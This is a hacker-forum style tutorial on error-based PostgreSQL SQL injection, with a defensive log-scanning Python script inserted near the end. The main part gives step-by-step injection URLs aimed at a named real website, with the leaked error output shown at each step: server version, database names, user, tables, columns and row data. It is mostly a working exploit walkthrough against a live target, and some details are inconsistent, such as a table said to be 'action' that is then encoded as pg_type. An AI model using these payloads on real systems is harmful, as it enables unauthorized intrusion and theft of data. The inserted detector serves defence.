denjacker

PostgreSQL Errorbased Injection


Short Introduction:

Postgres:

Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings, money, and dates.

Let's start to play with Postgres:

1st Step: find the vulnerability:

http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"

That means this website wants to be injected :D

Remember that errors can vary; you won't get the same error every time.

2nd Step: column count:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

We get a valid page.

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.

ERROR: ORDER BY position 2 is not in select list

That error shows that there is one column.

Let's try a UNION SELECT query:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.

ERROR: UNION types character varying and integer cannot be matched

Seems like the UNION SELECT query is not working!!! The error tells us why: the selected column is character varying, so the integer in our UNION cannot be matched with it.

Let's try error-based Postgres SQLi...

3rd Step:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see, the cast to int fails because the version string is not a number, and the error message echoes the offending value, so we got the version of the Postgres DB server in the form of an error.

Let's move on and find the database name.

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"

scoutsqld is the first database name; we can get the others by changing the offset :)

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "template0"

template0 is the 2nd database, so you can keep increasing the offset until you get an error.

Let's find out the user:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)

Let's find the tables :>

4th step:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is the first table; we can get the others by changing the offset :)

5th step:

Now we have to find the columns of our specific table!!!

e.g. our table is action

For that we have to use Oracle-style CHR() char conversion.

pg_type = CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

So our query is:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: " typname "

And further you can find the other columns using the offset.

Last step:

Now we have to extract data from our column.

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "bool"
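Every request in the walkthrough above has the same shape: a boolean condition compared against a cast of some string to an integer, answered by a PostgreSQL error that echoes that string back. As an added example from the defender's side (not from the original post), this Python script scans web-server access-log and PostgreSQL-log lines for that shape and pulls out the values the database leaked; the log lines, IPs and timestamps are constructed, and the log formats the regexes expect are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample logs (not from the original post): a web server access log and the
# matching PostgreSQL server log, as they would look while the cast-to-int probing runs.
ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120
10.0.0.7 - - [10/Oct/2023:12:00:09 +0000] "GET /index.cfm?MenuID=80%20and%201%3Dcast(version()%20as%20int)-- HTTP/1.1" 500 812
10.0.0.7 - - [10/Oct/2023:12:00:15 +0000] "GET /index.cfm?MenuID=80%20and%201%3Dcast((select%20datname%20from%20pg_database%20limit%201%20offset%200)%20as%20int)-- HTTP/1.1" 500 790
10.0.0.9 - - [10/Oct/2023:12:01:02 +0000] "GET /search.cfm?q=cast%20iron HTTP/1.1" 200 2048
"""
PG_LOG = """\
2023-10-10 12:00:09 UTC ERROR:  invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu"
2023-10-10 12:00:15 UTC ERROR:  invalid input syntax for integer: "scoutsqld"
2023-10-10 12:01:30 UTC LOG:  checkpoint starting: time
"""

# Assumed common-log-format line: client, identd, user, [timestamp], "METHOD target PROTO", status
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Boolean condition compared against a cast of an arbitrary expression to an integer type:
# the shape every request in the walkthrough above shares.
PROBE_RE = re.compile(r'\b(?:and|or)\s+\d+\s*=\s*cast\s*\(.+?\bas\s+(?:int|integer|bigint|numeric)\s*\)', re.I)
# Older servers say "for integer", newer ones "for type integer"; capture the echoed value.
PG_ERR_RE = re.compile(r'ERROR:\s+invalid input syntax for (?:type )?integer: "([^"]*)"')

def is_cast_probe(decoded_target: str) -> bool:
    """True when a decoded request target carries the cast-to-integer comparison pattern."""
    return PROBE_RE.search(decoded_target) is not None

def scan_access_log(text: str) -> list:
    """Return (client_ip, status, decoded_target) for each request that looks like a probe."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        decoded = unquote_plus(target)   # undo %20 / %3D so the pattern is visible
        if is_cast_probe(decoded):
            hits.append((ip, int(status), decoded))
    return hits

def scan_pg_log(text: str) -> list:
    """Return the non-numeric values PostgreSQL echoed back in integer-cast errors."""
    leaked = []
    for line in text.splitlines():
        m = PG_ERR_RE.search(line)
        if m and re.search(r'[A-Za-z]', m.group(1)):
            leaked.append(m.group(1))   # a value with letters was never a user-typed number
    return leaked
```

Running `scan_access_log(ACCESS_LOG)` flags only the two requests from 10.0.0.7 (the "cast iron" search is left alone), and `scan_pg_log(PG_LOG)` lists the version string and database name the server wrote into its own log; seeing both together is the signal that error text is reaching the client.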

Sorry for any mistakes and for my grammar mistakes :)

Thanks all

Xploiter
